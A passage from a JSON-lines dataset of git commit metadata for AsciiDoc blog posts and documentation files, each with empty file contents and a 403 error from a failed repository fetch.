Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Invisible-iPhone-Button....adoc","new_file":"_posts\/2018-02-26-The-Invisible-iPhone-Button....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20de765b01c4e1577f0cc622f1201d9a443607ec","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf0caf778286e3ed4095b997cce08949cd71a67","subject":"job: #12203 Fixed the fix and wrote the note. A follow-on issue has been raised to address a performance problem.","message":"job: #12203 Fixed the fix and wrote the note. A follow-on issue has been raised to address a performance problem.\n","repos":"travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12203_curly_braces_int.adoc","new_file":"doc-bridgepoint\/notes\/12203_curly_braces_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6077a58ffaae2510b87360307e186cf171d71078","subject":"y2b create post Twelve South BookArc Unboxing \\u0026 Overview","message":"y2b create post Twelve South BookArc Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-25-Twelve-South-BookArc-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-06-25-Twelve-South-BookArc-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52aad4ab8dd792fda5500a990e3782882d29659d","subject":"y2b create post Sony PS3 Wireless Keypad Unboxing \\u0026 Overview","message":"y2b create post Sony PS3 Wireless Keypad Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-01-Sony-PS3-Wireless-Keypad-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-10-01-Sony-PS3-Wireless-Keypad-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60b246fff40b734a201422ba9bd5b7480a8f46a4","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c04896659ce9f0006ab6e07b5a72488ee54ac2bc","subject":"y2b create post Casio G-Shock DW6900MS-1 Unboxing \\u0026 Overview","message":"y2b create post Casio G-Shock DW6900MS-1 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-10-Casio-GShock-DW6900MS1-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-10-Casio-GShock-DW6900MS1-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bf42537eec1b13016eae1257430bf5c8aa8003d","subject":"Renamed '_posts\/2019-01-31-java-language.adoc' to '_posts\/2019-01-31-object-oriented-programming-concepts.adoc'","message":"Renamed '_posts\/2019-01-31-java-language.adoc' to '_posts\/2019-01-31-object-oriented-programming-concepts.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-object-oriented-programming-concepts.adoc","new_file":"_posts\/2019-01-31-object-oriented-programming-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"257d12d96ca2f2980312f64575381249ebded54e","subject":"Update 2016-01-13-Rails-5beta.adoc","message":"Update 2016-01-13-Rails-5beta.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2016-01-13-Rails-5beta.adoc","new_file":"_posts\/2016-01-13-Rails-5beta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a9a06024db60a17076ad1b224635f3d0ed36c88","subject":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Publish 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c951413151440291802411cd76d63c7dba6a8088","subject":"y2b create post Can you find the iPhone on this carpet?","message":"y2b create post Can you find the iPhone on this carpet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-17-Can-you-find-the-iPhone-on-this-carpet.adoc","new_file":"_posts\/2016-07-17-Can-you-find-the-iPhone-on-this-carpet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27c0c4a68bd8aa066497e2b04be2e3fde0efa7bc","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34b092e746fe26fd74cd657126e2b78c44aa6247","subject":"y2b create post Unboxing Every iPhone 6S \\\/ 6S Plus","message":"y2b create post Unboxing Every iPhone 6S \\\/ 6S Plus","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-25-Unboxing-Every-iPhone-6S--6S-Plus.adoc","new_file":"_posts\/2015-09-25-Unboxing-Every-iPhone-6S--6S-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f72e43a290dbe218f6c6dd172c5e4d36b804296","subject":"Update 2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","message":"Update 2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","new_file":"_posts\/2016-01-30-Puzzle-2-Hack-Me-If-You-Can.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"403c1cc0a2dddb1527b673217ec828ecd58dfd0b","subject":"Delete the file at '_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc'","message":"Delete the file at '_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_file":"_posts\/2017-05-21-Drupal-8-Multilingual-Views.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c954efe068a3c6d19f54464b0c1f119e032a4ca7","subject":"last command fixed https:\/\/github.com\/docker\/labs\/issues\/350","message":"last command fixed https:\/\/github.com\/docker\/labs\/issues\/350\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9dc6128f9f4ac78afc4c1dfa7844ce612c56f58","subject":"y2b create post New Unboxing Videos!","message":"y2b create post New Unboxing Videos!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-30-New-Unboxing-Videos.adoc","new_file":"_posts\/2011-11-30-New-Unboxing-Videos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23e6d2877b43ae5d37c85f72dbddf4d16cd794c0","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a58fb5f3961c6f85e31479147deb5a04cb9622e","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"035aa235f43bf07a03dfe916d3084574067d5871","subject":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","message":"Update 2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_file":"_posts\/2018-07-0-Quick-Tips-3-How-to-create-a-pure-CSS-Off-Canvas-Menu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c702ce01f8432e6b2bca2385ab36771401ddc6e","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3443a499b24fbb8769eb25a7f30093bf150c4304","subject":"Update 2017-08-17-Serverless-Framework-Type-Script-2.adoc","message":"Update 2017-08-17-Serverless-Framework-Type-Script-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-2.adoc","new_file":"_posts\/2017-08-17-Serverless-Framework-Type-Script-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45fc2eb019dccf5d6bf70b29c94ab50fc41134d5","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aeda1029460eb79b3cfd900a58124da8808dbae","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"328fabf59ca3a7661e52dc76e760be7cb498b759","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"790883524a5bff2853a119751bd75c66dbb0dc49","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a82c5b11a98f4c5e647524ea3761023be1665889","subject":"update info on updating\/deleting tags","message":"update info on updating\/deleting tags\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3ff01105639b10b88722ce07a44b4431a12b913b","subject":"Update 2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","message":"Update 2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","new_file":"_posts\/2010-12-8-Recenberg-15th-success-rule-applied-to-lif.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c831ccf51a8d224e87326f15c89050442e0f315a","subject":"y2b create post The Essential Phone Is Back!","message":"y2b create post The Essential Phone Is Back!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-15-The%20Essential%20Phone%20Is%20Back!.adoc","new_file":"_posts\/2018-02-15-The%20Essential%20Phone%20Is%20Back!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d298833ee084b4612cfa8726e6a2da8fc20161d","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity-2.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity-2.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a4fbaf5289fc6d8d4e8ee9b74447b130f7897d","subject":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","message":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"696a187c89e5f8dcdad20d4c6879c12eeb1c87b2","subject":"Update 2016-10-10-Computer-Science-Linked-Lists.adoc","message":"Update 2016-10-10-Computer-Science-Linked-Lists.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-10-Computer-Science-Linked-Lists.adoc","new_file":"_posts\/2016-10-10-Computer-Science-Linked-Lists.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9247d8018603a15f5498502417fd4dc5d4f1c39f","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9316927278b66b2b1035fdb4c3430a51883bb89d","subject":"Update 2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","message":"Update 2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","new_file":"_posts\/2016-12-30-Contrsuct-backdoor-for-RSA-DH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a67b485ad5fc93218d807df7d8a89b4372fe32","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6d028c8372cd11d607311fed09ced8b9e515443","subject":"Update 2017-05-28-what-can-you-see-web-analytic.adoc","message":"Update 2017-05-28-what-can-you-see-web-analytic.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-what-can-you-see-web-analytic.adoc","new_file":"_posts\/2017-05-28-what-can-you-see-web-analytic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abe9db4a3c8c2d3d17c073ddf10da2c75ef26ace","subject":"y2b create post Quick Update","message":"y2b create post Quick Update","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-09-Quick-Update.adoc","new_file":"_posts\/2012-01-09-Quick-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cd676f5cc6d3a7d16ec519d31ad3013408759b3","subject":"Update 2017-01-21-Swap-Numbers.adoc","message":"Update 2017-01-21-Swap-Numbers.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_file":"_posts\/2017-01-21-Swap-Numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68c78a5e67b4f37fb07ac7e8f58d01bb9b06c76f","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4636a997aeb31cac17c4c376cc9a4d7cd117b2ca","subject":"Update 2017-08-17-Magic-Mirror.adoc","message":"Update 2017-08-17-Magic-Mirror.adoc","repos":"pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io,pamasse\/pamasse.github.io","old_file":"_posts\/2017-08-17-Magic-Mirror.adoc","new_file":"_posts\/2017-08-17-Magic-Mirror.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pamasse\/pamasse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"406490ad41055dda93c10d3d461f0a49ee86ce9d","subject":"Renamed '_posts\/2019-01-31-Java-Quiz.adoc' to '_posts\/2019-01-31-Java-Puzzles.adoc'","message":"Renamed '_posts\/2019-01-31-Java-Quiz.adoc' to '_posts\/2019-01-31-Java-Puzzles.adoc'","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2019-01-31-Java-Puzzles.adoc","new_file":"_posts\/2019-01-31-Java-Puzzles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 